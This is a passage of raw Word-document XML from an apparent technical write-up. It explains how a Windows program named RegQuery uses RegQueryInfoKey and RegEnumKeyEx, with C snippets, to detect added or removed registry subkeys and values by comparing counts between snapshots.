          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastValueName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A77FD" w:rsidRDefault="00BA32A4" w:rsidP="00BA32A4">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 xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00BA32A4">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA32A4" w:rsidRDefault="00320ED1" w:rsidP="00BA32A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Using a Windows API called “RegQueryInfoKey” for getting information from</w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry key.</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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegQueryInfoKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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key handle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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">achClass,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buffer for class name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cchClassName,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size of class string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reserved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cSubKeys,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number of subkeys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cbMaxSubKey,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longest subkey size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cchMaxClass,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longest class string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cValues,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number of values for this key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cchMaxValue,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longest value name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cbMaxValueData,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longest value data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cbSecurityDescriptor,   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">// security descriptor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">        &amp;ftLastWriteTime</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">);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last write time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00320ED1">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">That API returns </w:t>
      </w:r>
      <w:r w:rsidR="00A3196D">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2 valuable information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubKeys: The number of current subkeys belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00320ED1" w:rsidRDefault="00320ED1" w:rsidP="00320ED1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cValues: The number of current values belong to that key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">RegQuery identifying changing to the specified registry key by performing 2 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>step</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 1: Monitoring the Subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 2: Monitoring the Values</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRPr="00AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Monitoring the subkeys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00A3196D" w:rsidP="003F590C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>If the number of subkey is larger than 0, for each subkey, RegQuery returns specific information belong to that subkey, using a Windows API called “RegEnumKeyEx”. If the current queried subkey is the last subkey in chain</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the variable “aft” is set </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>to FALSE (indicates that there wasn’t any event happened in the current query process)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">, RegQuery copy </w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> name for returning later.</w:t>
      </w:r>
      <w:r w:rsidR="0055127B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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(i=0; i&lt;cSubKeys; i++)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cbName = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_KEY_LENGTH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</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retCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RegEnumKeyEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, i,</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achKey,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// the current querying subkey name</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&amp;cbName,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// size of subkey name</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&amp;ftLastWriteTime);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(retCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"(%d) %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>), i+1, achKey);</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((cSubKeys - 1 == i) &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&amp; !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !i)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wcscpy(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>lpLastSubkeyName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, achKey);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F590C" w:rsidRDefault="003F590C" w:rsidP="003F590C">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rsidR="00DB2D4C" w:rsidRDefault="00DB2D4C" w:rsidP="00DB2D4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>RegQuery defines a value called “retCode” which stores the return error code when calling RegEnumKeyEx. When the value returned is ERROR_SUCCESS indicating that the function is executed successfully, RegQuery does further steps.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When “aft” is FALSE, RegQuery also return the number of subkeys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="005512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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cSubKeys;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>and the number of value.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="005512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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRDefault="0055127B" w:rsidP="0055127B">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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nValues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = cValues;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A3196D" w:rsidRDefault="00AE6875" w:rsidP="00A3196D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When there is a registry event happened, RegQuery is called with “aft” set to TRUE. At that time, RegQuery defines a variable called “nCount”, which is the different between:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F05F19" w:rsidRDefault="00AE6875" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nSubkeys: The number of subkeys in the </w:t>
      </w:r>
      <w:r w:rsidR="00F05F19">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>previous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055127B" w:rsidRPr="00F05F19" w:rsidRDefault="0055127B" w:rsidP="00F05F19">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>cSubkeys: The number of subkeys in the current snapshot</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sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> nCount = 0;</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color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>aft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; (*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; cSubKeys)){</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nCount = (cSubKeys - *</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>nSubKeys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE687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AE687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AE6875" w:rsidRDefault="00AE6875" w:rsidP="00AE6875">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Based on nCount, RegQuery can indicate which event has happened in the registry database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE6875" w:rsidRDefault="00290AB6" w:rsidP="00AE6875">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nCount &lt; 0, there was a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r w:rsidR="00AE6875">
